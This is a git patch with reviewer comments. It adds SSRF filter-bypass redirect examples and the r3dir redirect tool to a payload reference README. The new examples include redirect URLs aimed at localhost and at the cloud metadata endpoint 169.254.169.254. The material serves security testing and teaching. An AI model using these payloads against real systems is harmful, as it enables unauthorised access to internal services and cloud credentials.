From 4cf17a3fab35460a4142ee5ff179c54dbb8d8988 Mon Sep 17 00:00:00 2001 From: Horlad <62111809+Horlad@users.noreply.github.com> Date: Thu, 27 Jun 2024 16:57:45 +0200 Subject: [PATCH 1/2] Update SSRF with redirect examples using r3dir README.md --- Server Side Request Forgery/README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 2f2bc292..f8d11873 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -263,6 +263,16 @@ vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection. ``` +To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use https://github.com/Horlad/r3dir which hosted on r3dir.me + +```powershell +#Redirects to http://localhost with `307 Temporary Redirect` status code +https://307.r3dir.me/--to/?url=http://localhost + +#Redirects to http://169.254.169.254/latest/meta-data/ with `302 Found` status code +https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me +``` + ### Bypassing using type=url ```powershell 
@@ -929,4 +939,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080) - [Pong [EN]| FCSC 2024 - vozec - April 12, 2024](https://vozec.fr/writeups/pong-fcsc2024-en/) - [Pong [EN]| FCSC 2024 - mizu.re - Apr 13, 2024](https://mizu.re/post/pong) -- [SSRFmap - Introducing the AXFR module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/) \ No newline at end of file +- [SSRFmap - Introducing the AXFR module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/) From b521dedb24c9993b9af21ca5a44069432e6fadc0 Mon Sep 17 00:00:00 2001 From: Horlad <62111809+Horlad@users.noreply.github.com> Date: Thu, 27 Jun 2024 17:01:41 +0200 Subject: [PATCH 2/2] Adding r3dir tool to SSRF README.md --- Server Side Request Forgery/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f8d11873..7e8d6955 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -63,8 +63,9 @@ - [tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - Generates gopher link for exploiting SSRF and gaining RCE in various servers - [In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) - Python based scanner to find potential SSRF parameters - [teknogeek/SSRF Sheriff](https://github.com/teknogeek/ssrf-sheriff) - Simple SSRF-testing sheriff written in Go -* [assetnote/surf](https://github.com/assetnote/surf) - Returns a list of viable SSRF candidates -* [dwisiswant0/ipfuscator](https://github.com/dwisiswant0/ipfuscator) - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go. +- [assetnote/surf](https://github.com/assetnote/surf) - Returns a list of viable SSRF candidates +- [dwisiswant0/ipfuscator](https://github.com/dwisiswant0/ipfuscator) - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go. +- [Horlad/r3dir](https://github.com/Horlad/r3dir) - a redirection service designed to help bypass SSRF filters that do not validate the redirect location. Intergrated with Burp with help of Hackvertor tags ## Payloads with localhost
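Review bot: in the `@@ -263` hunk the new introductory sentence has several wording errors and the second example cannot be reproduced from what the page says. "hosting own redirect server", "seemless" and "which hosted on r3dir.me" should read "hosting your own redirect server", "seamless" and "which is hosted on r3dir.me". The second URL, `https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me`, is an opaque encoded hostname; the comment says it redirects to `http://169.254.169.254/latest/meta-data/`, but nothing explains how that hostname is derived from the target, so a reader can neither construct nor check one. Either state the encoding the tool uses or link the part of the r3dir README that documents it. The sentence should also say that r3dir.me is a third-party hosted service, so every target URL encoded into such a link (typically an internal address) is disclosed to its operator, and point to running the tool on your own infrastructure if the project supports that, as the "without hosting own redirect server" wording implies.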
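Review bot: the `@@ -929` hunk only adds the missing trailing newline after the last reference entry. That is a harmless fix, but it is unrelated to the r3dir addition and is not mentioned in the commit message, so either call it out there or leave it for a separate commit.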
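Review bot: in the `@@ -63` hunk the new `Horlad/r3dir` entry has a typo and does not follow the style of the neighbouring tool entries. "Intergrated" should be "Integrated", the description should start with a capital letter ("A redirection service ...") like the other entries, and "with help of Hackvertor tags" reads better as "via Hackvertor tags". The two lines above it are only changed from `*` to `-` bullets; that is a reasonable consistency fix, but it is an unrelated change bundled into this commit and deserves a mention in the commit message.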